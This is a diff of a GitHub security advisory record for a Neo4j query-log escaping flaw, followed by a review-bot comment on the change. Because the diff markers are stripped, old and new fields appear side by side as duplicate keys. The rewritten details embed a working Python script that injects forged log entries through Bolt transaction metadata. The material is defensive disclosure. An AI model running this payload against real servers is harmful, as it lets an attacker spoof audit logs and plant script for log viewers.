@@ -1,19 +1,14 @@
{
"schema_version": "1.4.0",
"id": "GHSA-xr72-g735-4vwp",
"modified": "2026-02-06T19:41:15Z",
"modified": "2026-02-06T19:41:16Z",
"published": "2026-02-06T15:31:03Z",
"aliases": [
"CVE-2026-1337"
],
"summary": "Neo4j Enterprise and Community editions have insufficient escaping of unicode characters in query log",
"details": "Insufficient escaping of unicode characters in query log in Neo4j Enterprise and Community editions prior to 2026.01 can lead to XSS if the user opens the logs in a tool that treats them as HTML. There is no security impact on Neo4j products, but this advisory is released as a precaution to treat the logs as plain text if using versions prior to 2026.01.\n\nProof of concept exploit:  https://github.com/JoakimBulow/CVE-2026-1337",
"severity": [
{
"type": "CVSS_V4",
"score": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:A/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:P"
}
],
"summary": "Xss Vulnerability - Neo4j Enterprise and Community editions have insufficient escaping of unicode characters in query log",
"details": "# Vulnerability in Neo4j Enterprise and Community Editions (CVE-2026-1337)\n\nNeo4j Enterprise and Community editions prior to 2026.01 are vulnerable to insufficient escaping of Unicode characters in the query log, which can lead to Cross-Site Scripting (XSS) if the logs are opened in a tool that interprets them as HTML. There is no direct security impact on Neo4j products themselves, but this advisory is issued as a precaution to treat the logs as plain text when using versions prior to 2026.01.\n\n## Details\n\nThe vulnerability arises from improper handling of control characters (e.g., newlines) in the metadata field of Bolt transactions when Neo4j is not configured to use JSON-formatted logging. An authenticated user can inject arbitrary log entries, potentially spoofing queries or introducing malicious content.\n\n- **Vulnerability Type**: CWE-117 (Improper Output Neutralization for Logs) / CWE-79 (Improper Neutralization of Input During Web Page Generation - XSS)\n- **Root Cause**: Failure to escape control characters like `\\n` in query log entries, allowing log injection when logging is in plain text format.\n- **Execution Flow**:\n 1. An authenticated attacker connects to the Neo4j Bolt port (default: 7687).\n 2. They initiate a transaction with malicious metadata containing newlines and crafted log lines.\n 3. The unescaped metadata is written to `query.log`, injecting fake entries.\n 4. If logs are viewed in a web-based tool or terminal, it could lead to XSS or terminal manipulation via ANSI escapes.\n\n## Proof of Concept (PoC)\n\nThe vulnerability can be demonstrated using a Python script with the Neo4j driver. A proof-of-concept is available at: https://github.com/JoakimBulow/CVE-2026-1337\n\n**Steps to Reproduce:**\n1. Set up a Neo4j instance prior to 2026.01 with plain text logging (not JSON).\n2. Install the Neo4j Python driver: `pip install neo4j`.\n3. 
Run the following script (adapted from the PoC):\n\n```python\nfrom neo4j import GraphDatabase\n\nuri = \"bolt://127.0.0.1:7687\"\nusername = \"neo4j\"\npassword = \"your_password\"\n\npayload = \"\\n2025-12-05 13:08:34.148+0000 INFO Query started: id:700 - MATCH (n:FakeQuery1) RETURN n LIMIT 1\\n2025-12-05 13:08:34.148+0000 INFO Query started: id:701 - MATCH (n:FakeQuery2) RETURN n LIMIT 1\"\n\ndriver = GraphDatabase.driver(uri, auth=(username, password))\n\nwith driver.session() as session:\n tx = session.begin_transaction(metadata={\"x\": payload})\n tx.run(\"RETURN 1\")\n tx.commit()\n\ndriver.close()",
"severity": [],
"affected": [
{
"package": {
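Review bot: the new `"severity": []` line at the end of this hunk drops the CVSS v4 entry (`"type": "CVSS_V4"`, `"score": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:A/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:P"`) that the original record carried, so downstream consumers of this GHSA/OSV record lose the machine-readable severity; keep the severity object unless the score is being withdrawn deliberately, and state that in the PR description if so. Two smaller points on the replacement `summary` and `details` strings: the summary prefix `Xss Vulnerability - ` should read `XSS` to match the details text, and the rewritten details introduce claims the original record did not make (CWE-117 log injection via Bolt transaction metadata, terminal manipulation through ANSI escapes) and inline a full PoC script where the original kept only the link; each added claim should cite its source, and the advisory body should keep the PoC as a reference link rather than embedding the script in the record.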